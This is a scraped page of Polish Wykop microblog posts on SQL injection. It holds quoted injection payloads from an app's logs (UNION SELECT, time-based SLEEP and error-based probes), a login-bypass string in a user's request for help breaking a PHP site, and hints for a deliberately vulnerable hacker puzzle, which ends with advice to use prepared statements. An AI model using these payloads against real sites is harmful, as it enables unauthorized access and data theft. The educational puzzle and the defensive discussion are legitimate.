#wykop #bezpieczenstwo #bezpieczenstwowsieci #raporter #hakujo
Ludzie nieustannie wpisują jakieś dziwne rzeczy do Raportera, to chyba ma być #sqlinjection #sql tylko, że ja nie używam sql ( ͡° ͜ʖ ͡°)

1111111111111" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45) -- /* order by "as /*
' AnD sLeep(3) ANd '1
'&&SLeeP('0 3')&&'1
'&&' '=0x20&&sLEEp(3)&&'1
'And'1'&&SLEep(3)&&'1
'&&'/**/'=0x2F2A2A2F&&SleeP(3)&&'1
' AnD SLeeP(3) #
' And sLEEp(3)
or (1,2)=(select*from(select nameconst(CHAR(110,105,121,76,112,105,103,73,88),1),nameconst(CHAR(110,105,121,76,112,105,103,73,88),1))a) -- and 1=1
' or
antros - #wykop #bezpieczenstwo #bezpieczenstwowsieci #raporter #hakujo 
Ludzie nieu...

źródło: comment_c1ULV6aubdbLO2XjWOCOY6sZOtfhbz9v.jpg

Pobierz
  • Odpowiedz
Mirki! Znalazłem na dysku stronkę php którą zrobiłem pare lat temu. Nie pamiętam jak ją pisałem ale próbuję ją złamać . Może podrzucicie jakieś pomysły. Do tej pory mam:
1.[POST] po wpisaniu do loginu: 0' or 1=1# zwraca prawde status 200 i login.php ale bez kontentu.
2.[POST] w loginie: ' zwraca Warning: mysqlnumrows(): supplied argument is not a valid MySQL result resource in home/mojuser/bla/bla/login.php on line 23
3.[POST] Input: search
@matth95: Jak pisałeś stronkę, to masz i pliki. Poszukaj sobie w nich ustawień bazy i będziesz mieć co trzeba.

No chyba, że ta stronka jest na Twoim dysku zupełnie tak samo jak ja jestem biskupem.
  • Odpowiedz
Cześć Mirki, wrzuciłem nowy odcinek na YT. Tym razem porozmawiamy trochę o SQL Injection a głównym tematem odcinka są relację w bazie danych oraz JOIN-owanie rekordów. Przypominam również że 11 grudnia w Krakowie odbędzie się 3 edycja PHPers, wstęp jest darmowy tak więc gorąco zapraszam Was na tą imprezę.

#odzeradowebdeva <-- można obserwować ( ͡° ͜ʖ ͡°) #php #webdev #sqlinjection #quatronetszkolenie
dyktek - Cześć Mirki, wrzuciłem nowy odcinek na YT. Tym razem porozmawiamy trochę o S...
Mirki, jestem technicznym na stronie jednej z największych szkół technicznych w regionie. Siłą rzeczy co jakiś czas walczę z domorosłymi hakierami. Do tej pory żadna #ladnapani pod osłoną nocy się na stronie nie pojawiła, ale czuję, że to już tylko kwestia czasu. Jakiś czas temu ataki się nasiliły i przez pomysłowość hakiera ledwo się bronię. Mam jego prawdziwe IP, lokalizację i dostawcę internetu (#opsec poległ), więc wniosek na policję za nieautoryzowane #
  • 22
Raz spotkałem się z magistrem który nie znał "limit" wiec pobrał wszystkie rekordy i przefiltrował w pętli.
  • Odpowiedz
#programowanie #zagadkihakerskie #sqlinjection

Ostatnio rzuciłem wyzwanie, żeby wykorzystując błąd typu SQL Injection, wykraść hasło użytkownika admin ze strony http://hakerium.cba.pl/zad1/.

Niestety, wyniki okazały się dość słabe, stąd podsyłam krok po kroku jak mógłby wyglądać tok myślenia osoby, która chciałaby przełamać zabezpieczenie tej strony.

Przede wszystkim, w przypadku testowania normalnej strony nie ma takiej sytuacji, jaka była tutaj, tj. że z góry było wiadomo, że podatność na SQL Injection istnieje. Najpierw trzeba ją zweryfikować
Ochrona przed zagrożeniem:

Tak naprawdę istotą tej zagadki było pokazanie, że nawet jeśli informacje ze strony serwera są skąpe, to na podstawie obserwacji jego zachowania w różnych sytuacjach można z bazy wyciągnąć dane jeśli istnieje podatność na SQL Injection.

A jak się przed SQL Injection bronić? Zawsze mówiło się o potrzebie odpowiedniego enkodowania danych przed wrzuceniem ich do bazy. Najlepszą jednak metodą i najpewniejszą jest stosowanie parametryzowanych zapytań (prepared statements). Każdy liczący
  • Odpowiedz
#zagadkihakerskie #sqlinjection

Kilka osób zaobserwowało taga, więc być może będzie jeszcze zainteresowana jakimiś wskazówkami do wczorajszej zagadki.

Zwróćcie uwagę, że jak wpiszecie nazwę użytkownika

admin
z dowolnym hasłem, dostaniecie odpowiedź: Nieudane logowanie.

Z kolei gdy wpiszecie jakiegoś innego użytkownika, np.

blablabla
, w odpowiedzi dostaniecie: Nieudane logowanie

Jest pewna subtelna różnica między tymi odpowiedziami :)

Dodatkowy hint: po wpisaniu nazwy użytkownika

ad'+'min
także w odpowiedzi jest Nieudane logowanie.
#programowanie #zagadkihakerskie #sqlinjection

A może zagadki hakerskie? Poniżej strona inspirowana pewną rzeczywistą sytuacją, z którą się spotkałem. Strona jest podatna na SQL Injection. Chodzi o to, żeby wykorzystać tę lukę do zalogowania się na użytkownika admin. Jeśli logowanie się uda, pojawi się komunikat: Zalogowany jako admin!.

http://hakerium.cba.pl/zad1/

Od razu mówię, że wykorzystanie luki nie jest aż tak bardzo trywialne i nie ograniczy się do

OR 1=1 --
;)
Przejrzałem logi tego co wpisywaliście i póki co jest raczej dość słabo... Jedna osoba próbowała iść w dobrym kierunku, ale chyba się zniechęciła.
  • Odpowiedz